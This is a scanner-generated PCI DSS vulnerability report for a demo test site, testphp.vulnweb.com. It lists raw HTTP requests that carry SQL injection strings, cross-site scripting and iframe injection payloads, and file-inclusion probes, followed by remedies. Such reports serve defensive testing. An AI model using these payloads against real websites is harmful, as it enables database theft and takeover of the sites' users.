16/12/2020 11:13 AM (UTC+03:00)
PCI DSS Compliance Report
9
20
19
3
0
0
http://testphp.vulnweb.com/
http://testphp.vulnweb.com/
Scan Time
Scan Duration
Description
15/10/2020 04:51 PM
00:00:19:31
Php Test Website
Total Requests: 19,660
Average Speed: 16.8 r/s
Risk Level:
CRITICAL
Explanation
This report is generated based on PCI classification and it has no validity. PCI DSS scans must be performed by an approved scanning vendor.

There are 8 more vulnerabilities that are not shown below. Please take a look at the detailed scan report to see them.

VULNERABILITIES
51
IDENTIFIED
39
CONFIRMED
9
CRITICAL
20
HIGH
19
MEDIUM
3
LOW
0
BEST PRACTICE
0
INFORMATION
Identified Vulnerabilities
Critical
High
Medium
Low
Best Practice
Information
TOTAL
9
20
19
3
0
0
51
Confirmed Vulnerabilities
Critical
High
Medium
Low
Best Practice
Information
TOTAL
7
18
14
0
0
0
39

Vulnerabilities By PCI DSS v3.2

SEVERITY FILTER :
CONFIRM VULNERABILITY METHOD URL SEVERITY
6.5.1 - INJECTION FLAWS
Boolean Based SQL Injection GET http://testphp.vulnweb.com/artists.php?artist=1%20OR%2017-7%3d10 CRITICAL
Boolean Based SQL Injection POST http://testphp.vulnweb.com/userinfo.php CRITICAL
Boolean Based SQL Injection POST http://testphp.vulnweb.com/userinfo.php CRITICAL
Boolean Based SQL Injection GET http://testphp.vulnweb.com/product.php?pic=1%20OR%2017-7%3d10 CRITICAL
SQL Injection GET http://testphp.vulnweb.com/listproducts.php?cat=-1%20or%201%3d1%20and%20(SELECT%201%20and%20ROW(1%2c1)%3e(SELECT%20COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a) CRITICAL
SQL Injection POST http://testphp.vulnweb.com/secured/newuser.php CRITICAL
SQL Injection GET http://testphp.vulnweb.com/listproducts.php?artist=-1%20or%201%3d1%20and%20(SELECT%201%20and%20ROW(1%2c1)%3e(SELECT%20COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a) CRITICAL
[Probable] SQL Injection GET http://testphp.vulnweb.com/listproducts.php?cat=%2527 CRITICAL
[Probable] SQL Injection GET http://testphp.vulnweb.com/listproducts.php?artist=%2527 CRITICAL
Frame Injection POST http://testphp.vulnweb.com/search.php?test=query MEDIUM
Frame Injection GET http://testphp.vulnweb.com/listproducts.php?cat=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e MEDIUM
Frame Injection POST http://testphp.vulnweb.com/guestbook.php MEDIUM
Frame Injection POST http://testphp.vulnweb.com/guestbook.php MEDIUM
Frame Injection POST http://testphp.vulnweb.com/secured/newuser.php MEDIUM
Frame Injection POST http://testphp.vulnweb.com/secured/newuser.php MEDIUM
Frame Injection POST http://testphp.vulnweb.com/secured/newuser.php MEDIUM
Frame Injection POST http://testphp.vulnweb.com/secured/newuser.php MEDIUM
Frame Injection GET http://testphp.vulnweb.com/listproducts.php?artist=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e MEDIUM
Frame Injection POST http://testphp.vulnweb.com/secured/newuser.php MEDIUM
Frame Injection POST http://testphp.vulnweb.com/secured/newuser.php MEDIUM
Frame Injection GET http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=&p=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e&pp=12 MEDIUM
Frame Injection GET http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=&p=valid&pp=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e MEDIUM
Frame Injection POST http://testphp.vulnweb.com/comment.php MEDIUM
Frame Injection GET http://testphp.vulnweb.com/showimage.php?file=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e MEDIUM
Frame Injection GET http://testphp.vulnweb.com/showimage.php?file=%3ciframe%20src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e&size=160 MEDIUM
6.5.4 - INSECURE COMMUNICATIONS
Password Transmitted over HTTP GET http://testphp.vulnweb.com/login.php HIGH
SSL/TLS Not Implemented GET https://testphp.vulnweb.com/ MEDIUM
6.5.5 - IMPROPER ERROR HANDLING
Database Error Message Disclosure GET http://testphp.vulnweb.com/listproducts.php?cat=%2527 LOW
6.5.7 - CROSS SITE SCRIPTING (XSS)
Cross-site Scripting POST http://testphp.vulnweb.com/search.php?test=query HIGH
Cross-site Scripting GET http://testphp.vulnweb.com/listproducts.php?cat=%3cscRipt%3enetsparker(0x009DCB)%3c%2fscRipt%3e HIGH
Cross-site Scripting POST http://testphp.vulnweb.com/guestbook.php HIGH
Cross-site Scripting POST http://testphp.vulnweb.com/guestbook.php HIGH
Cross-site Scripting GET http://testphp.vulnweb.com/hpp/?pp=x%22%20onmouseover%3dnetsparker(0x00AC40)%20x%3d%22 HIGH
Cross-site Scripting POST http://testphp.vulnweb.com/secured/newuser.php HIGH
Cross-site Scripting POST http://testphp.vulnweb.com/secured/newuser.php HIGH
Cross-site Scripting POST http://testphp.vulnweb.com/secured/newuser.php HIGH
Cross-site Scripting POST http://testphp.vulnweb.com/secured/newuser.php HIGH
Cross-site Scripting GET http://testphp.vulnweb.com/listproducts.php?artist=%3cscRipt%3enetsparker(0x00B6A9)%3c%2fscRipt%3e HIGH
Cross-site Scripting POST http://testphp.vulnweb.com/secured/newuser.php HIGH
Cross-site Scripting POST http://testphp.vulnweb.com/secured/newuser.php HIGH
Cross-site Scripting GET http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=&p=%3cscRipt%3enetsparker(0x00BF39)%3c%2fscRipt%3e&pp=12 HIGH
Cross-site Scripting GET http://testphp.vulnweb.com/hpp/params.php?aaaa%2f=&p=valid&pp=%3cscRipt%3enetsparker(0x00BF46)%3c%2fscRipt%3e HIGH
Cross-site Scripting POST http://testphp.vulnweb.com/comment.php HIGH
Cross-site Scripting via Remote File Inclusion GET http://testphp.vulnweb.com/showimage.php?file=hTTp%3a%2f%2fr87.com%2fn&size=160 HIGH
Cross-site Scripting via Remote File Inclusion GET http://testphp.vulnweb.com/showimage.php?file=hTTp%3a%2f%2fr87.com%2fn HIGH
[Possible] Cross-site Scripting GET http://testphp.vulnweb.com/showimage.php?file='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x008F96)%3C/scRipt%3E MEDIUM
[Possible] Cross-site Scripting GET http://testphp.vulnweb.com/showimage.php?file='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x00976E)%3C/scRipt%3E&size=160 MEDIUM
6.5.8 - IMPROPER ACCESS CONTROL
Local File Inclusion GET http://testphp.vulnweb.com/showimage.php?file=data%3a%3bbase64%2cTlM3NzU0NTYxNDQ2NTc1 HIGH
Local File Inclusion GET http://testphp.vulnweb.com/showimage.php?file=data%3a%3bbase64%2cTlM3NzU0NTYxNDQ2NTc1&size=160 HIGH
6.5.9 - CROSS-SITE REQUEST FORGERY (CSRF)
[Possible] Cross-site Request Forgery GET http://testphp.vulnweb.com/guestbook.php LOW
[Possible] Cross-site Request Forgery in Login Form GET http://testphp.vulnweb.com/login.php LOW

1. [Probable] SQL Injection

CRITICAL
2

Acunetix 360 identified a Probable SQL Injection, which occurs when data input by a user is interpreted as an SQL command rather than as normal data by the backend database.

This is an extremely common vulnerability and its successful exploitation can have critical implications.

Even though Acunetix 360 believes there is a SQL injection in here, it could not confirm it. There can be numerous reasons for Acunetix 360 not being able to confirm this. We strongly recommend investigating the issue manually to ensure it is an SQL injection and that it needs to be addressed. You can also consider sending the details of this issue to us so we can address this issue for the next time and give you a more precise result.

Impact

Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, updating and deleting arbitrary data/tables from the database.
  • Executing commands on the underlying operating system.

Vulnerabilities

1.1. http://testphp.vulnweb.com/listproducts.php?artist=%2527
Method Parameter Value
GET artist %27

Certainty



Go to the highlighted output

Request

GET /listproducts.php?artist=%2527 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/artists.php?artist=1
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 206.5248
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 
HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: text/html
Transfer-Encoding: chunked
Date: Fri, 02 Jan 1970 08:11:46 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>pictures</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>

</head>
<body> 
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead"> 
  <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1>   
  <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>
  <div id="globalNav"> 
      	<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>
	<td align="left">
		<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists
		</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | 
		<a href="guestbook.php">guestbook</a> | 
		<a href="AJAX/index.php">AJAX Demo</a>
	</td>
	<td

1.2. http://testphp.vulnweb.com/listproducts.php?cat=%2527
Method Parameter Value
GET cat %27

Certainty



Go to the highlighted output

Request

GET /listproducts.php?cat=%2527 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/categories.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 189.3741
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 
HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: text/html
Transfer-Encoding: chunked
Date: Fri, 02 Jan 1970 08:08:33 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>pictures</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>

</head>
<body> 
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead"> 
  <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1>   
  <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>
  <div id="globalNav"> 
      	<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>
	<td align="left">
		<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists
		</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | 
		<a href="guestbook.php">guestbook</a> | 
		<a href="AJAX/index.php">AJAX Demo</a>
	</td>
	<td

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of s DAL will help centralize the issue and its resolution. You can also use ORM (object relational mapping). Most ORM systems use parameterized queries and this can solve many if not all SQL injection based problems.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
  4. Monitor and review weblogs and application logs to uncover active or previous exploitation attempts.

Remedy

A very robust method for mitigating the threat of SQL injection-based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to test for SQL injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL injection is one of the most common web application vulnerabilities.

External References

Remedy References

CLASSIFICATION

PCI DSS v3.2 6.5.1

CVSS 3.0 SCORE
Base10 (Critical)
Temporal10 (Critical)
Environmental10 (Critical)

CVSS Vector String
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVSS 3.1 SCORE
Base10 (Critical)
Temporal10 (Critical)
Environmental10 (Critical)

CVSS Vector String
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

2. Boolean Based SQL Injection

CRITICAL
4
CONFIRMED
4

Acunetix 360 identified a Boolean-Based SQL Injection, which occurs when data input by a user is interpreted as a SQL command rather than as normal data by the backend database.

This is an extremely common vulnerability and its successful exploitation can have critical implications.

Acunetix 360 confirmed the vulnerability by executing a test SQL query on the backend database. In these tests, SQL injection was not obvious, but the different responses from the page based on the injection test allowed Acunetix 360 to identify and confirm the SQL injection.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, updating and deleting arbitrary data/tables from the database
  • Executing commands on the underlying operating system

Vulnerabilities

2.1. http://testphp.vulnweb.com/artists.php?artist=1%20OR%2017-7%3d10
CONFIRMED
CONFIRMED
Method Parameter Value
GET artist 1 OR 17-7=10

Proof of Exploit

Identified Database Version

5.1.73-0ubuntu0.10.04.1

Identified Database User

acuart@localhost

Identified Database Name

acuart
Go to the highlighted output

Request

GET /artists.php?artist=1%20OR%2017-7%3d10 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/artists.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 195.9735
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 
HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: text/html
Transfer-Encoding: chunked
Date: Fri, 02 Jan 1970 08:06:29 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>artists</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<!-- here goes headers headers -->
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>

</head>
<body> 
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead"> 
  <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1>   
  <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>
  <div id="globalNav"> 
      	<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>
	<td align="left">
		<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists
		</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | 
		<a href="guestbook.php">guestbook</a> | 
		<a href="AJAX/in

2.2. http://testphp.vulnweb.com/product.php?pic=1%20OR%2017-7%3d10
CONFIRMED
CONFIRMED
Method Parameter Value
GET pic 1 OR 17-7=10

Proof of Exploit

Identified Database Version (cached)

5.1.73-0ubuntu0.10.04.1

Identified Database User (cached)

acuart@localhost

Identified Database Name (cached)

acuart
Go to the highlighted output

Request

GET /product.php?pic=1%20OR%2017-7%3d10 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/search.php?test=query
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 1100.191
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 
HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: text/html
Transfer-Encoding: chunked
Date: Fri, 02 Jan 1970 08:09:42 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>picture details</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<script language="javascript1.2">
<!--
	function popUpWindow(URLStr, left, top, width, height)
	{
	  window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+'');
	}
-->
</script>
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>

</head>
<body> 
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead"> 
  <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1>   
  <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>
  <div id="globalNav"> 
      	<table border="0"

2.3. http://testphp.vulnweb.com/userinfo.php
CONFIRMED
CONFIRMED
Method Parameter Value
POST uname Smith
POST pass -1' OR 1=1 OR 'ns'='ns

Proof of Exploit

Identified Database Version (cached)

5.1.73-0ubuntu0.10.04.1

Identified Database User (cached)

acuart@localhost

Identified Database Name (cached)

acuart
Go to the highlighted output

Request

POST /userinfo.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 51
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

uname=Smith&pass=-1%27+OR+1%3d1+OR+%27ns%27%3d%27ns

Response

Response Time (ms) : 189.5437
Total Bytes Received : 218
Body Length : 0
Is Compressed : No 
HTTP/1.1 200 OK
Set-Cookie: login=test%2Ftest
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: text/html
Transfer-Encoding: chunked
Date: Fri, 02 Jan 1970 08:08:31 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>user info</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<!-- here goes headers headers -->
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>

</head>
<body> 
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead"> 
  <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1>   
  <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>
  <div id="globalNav"> 
      	<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>
	<td align="left">
		<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists
		</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | 
		<a href="guestbook.php">gue

2.4. http://testphp.vulnweb.com/userinfo.php
CONFIRMED
CONFIRMED
Method Parameter Value
POST uname -1' OR 1=1 OR 'ns'='ns
POST pass Inv1@cti

Proof of Exploit

Identified Database Version (cached)

5.1.73-0ubuntu0.10.04.1

Identified Database User (cached)

acuart@localhost

Identified Database Name (cached)

acuart
Go to the highlighted output

Request

POST /userinfo.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 56
Content-Type: application/x-www-form-urlencoded
Referer: http://testphp.vulnweb.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

uname=-1%27+OR+1%3d1+OR+%27ns%27%3d%27ns&pass=Inv1%40cti

Response

Response Time (ms) : 196.5493
Total Bytes Received : 218
Body Length : 0
Is Compressed : No 
HTTP/1.1 200 OK
Set-Cookie: login=test%2Ftest
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: text/html
Transfer-Encoding: chunked
Date: Fri, 02 Jan 1970 08:05:27 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>user info</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<!-- here goes headers headers -->
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>

</head>
<body> 
<div id="mainLayer" style="position:absolute; width:700px; z-index:1">
<div id="masthead"> 
  <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1>   
  <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6>
  <div id="globalNav"> 
      	<table border="0" cellpadding="0" cellspacing="0" width="100%"><tr>
	<td align="left">
		<a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists
		</a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | 
		<a href="guestbook.php">gue

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you centralize the issue. You can also use ORM (object relational mapping). Most of the ORM systems use only parameterized queries and this can solve the whole SQL injection problem.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
  4. Use your weblogs and application logs to see if there were any previous but undetected attacks to this resource.

Remedy

The best way to protect your code against SQL injections is using parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them.

External References

Remedy References

CLASSIFICATION

PCI DSS v3.2 6.5.1

CVSS 3.0 SCORE
Base10 (Critical)
Temporal10 (Critical)
Environmental10 (Critical)

CVSS Vector String
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CVSS 3.1 SCORE
Base10 (Critical)
Temporal10 (Critical)
Environmental10 (Critical)

CVSS Vector String
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

3. SQL Injection

CRITICAL
3
CONFIRMED
3

Acunetix 360 identified an SQL Injection, which occurs when data input by a user is interpreted as an SQL command rather than as normal data by the backend database.

This is an extremely common vulnerability and its successful exploitation can have critical implications.

Acunetix 360 confirmed the vulnerability by executing a test SQL query on the backend database.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, updating and deleting arbitrary data or tables from the database
  • Executing commands on the underlying operating system

Vulnerabilities

